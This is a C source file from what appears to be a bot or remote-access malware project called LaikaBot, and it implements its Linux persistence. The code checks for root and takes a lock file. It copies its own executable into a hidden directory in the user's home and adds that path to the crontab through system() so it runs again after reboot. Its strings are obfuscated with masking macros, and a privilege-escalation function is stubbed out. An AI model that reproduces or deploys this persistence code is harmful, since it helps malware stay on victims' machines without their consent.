/* platform specific code for achieving persistence on linux */ #include #include #include #include #include #include "persist.h" #include "lconfig.h" #include "lsocket.h" #include "lerror.h" #include "lbox.h" #include "lmem.h" static int laikaB_lockFile; /* check if laika is running as super-user */ bool laikaB_checkRoot() { return geteuid() == 0; /* user id 0 is reserved for root in 99% of the cases */ } /* mark that laika is currently running */ void laikaB_markRunning() { LAIKA_BOX_SKID_START(char*, filePath, LAIKA_LIN_LOCK_FILE); /* create lock file */ if ((laikaB_lockFile = open(filePath, O_RDWR | O_CREAT, 0666)) == -1) LAIKA_ERROR("Couldn't open file lock '%s'! Another LaikaBot is probably running.\n", filePath); /* create lock */ if (flock(laikaB_lockFile, LOCK_EX | LOCK_NB) != 0) LAIKA_ERROR("Failed to create file lock!\n"); LAIKA_DEBUG("file lock created!\n"); LAIKA_BOX_SKID_END(filePath); } /* unmark that laika is currently running */ void laikaB_unmarkRunning() { /* close lock */ if (flock(laikaB_lockFile, LOCK_UN) != 0) LAIKA_ERROR("Failed to close file lock!\n"); close(laikaB_lockFile); LAIKA_DEBUG("file lock removed!\n"); } void getCurrentExe(char *outPath, int pathSz) { int sz; /* thanks linux :D */ if ((sz = readlink("/proc/self/exe", outPath, pathSz - 1)) == -1) LAIKA_ERROR("Failed to grab current process executable path!\n"); outPath[sz] = '\0'; } void getInstallPath(char *outPath, int pathSz) { struct stat st; const char *home; /* try to read home from ENV, else get it from pw */ if ((home = getenv("HOME")) == NULL) { home = getpwuid(getuid())->pw_dir; } /* create install directory if it doesn't exist */ LAIKA_BOX_SKID_START(char*, dirPath, LAIKA_LIN_INSTALL_DIR); LAIKA_BOX_SKID_START(char*, filePath, LAIKA_LIN_INSTALL_FILE); snprintf(outPath, pathSz, "%s/%s", home, dirPath); if (stat(outPath, &st) == -1) { LAIKA_DEBUG("creating '%s'...\n", outPath); mkdir(outPath, 0700); } snprintf(outPath, pathSz, "%s/%s/%s", home, dirPath, filePath); LAIKA_BOX_SKID_END(dirPath); LAIKA_BOX_SKID_END(filePath); } bool checkPersistCron(char *path) { char buf[PATH_MAX + 128]; FILE *fp; bool res = false; if ((fp = popen("crontab -l", "r")) == NULL) LAIKA_ERROR("popen('crontab') failed!"); while (fgets(buf, sizeof(buf), fp)) { if (strstr(buf, path)) { /* laika is installed in the crontab! */ res = true; break; } } pclose(fp); return res; } void tryPersistCron(char *path) { LAIKA_BOX_SKID_START(char*, cronCMD, LAIKA_LIN_CRONTAB_ENTRY); char cmd[PATH_MAX + 128]; /* should be 'safe enough' */ snprintf(cmd, PATH_MAX + 128, cronCMD, path); /* add laika to crontab */ if (system(cmd)) LAIKA_ERROR("failed to install '%s' to crontab!\n", path); LAIKA_DEBUG("Installed '%s' to crontab!\n", path); LAIKA_BOX_SKID_END(cronCMD); } /* try to gain persistance on machine */ void laikaB_tryPersist() { char exePath[PATH_MAX]; char installPath[PATH_MAX]; /* grab current process's executable & get the install path */ getCurrentExe(exePath, PATH_MAX); getInstallPath(installPath, PATH_MAX); /* move exe to install path (if it isn't there already) */ if (strncmp(exePath, installPath, strnlen(exePath, PATH_MAX)) != 0 && rename(exePath, installPath)) LAIKA_ERROR("Failed to install '%s' to '%s'!\n", exePath, installPath); LAIKA_DEBUG("Successfully installed '%s'!\n", installPath); LAIKA_TRY /* enable persistence on reboot via cron */ if (!checkPersistCron(installPath)) tryPersistCron(installPath); LAIKA_CATCH LAIKA_DEBUG("crontab not installed or not accessible!"); LAIKA_TRYEND } /* try to gain root */ void laikaB_tryRoot() { /* stubbed */ }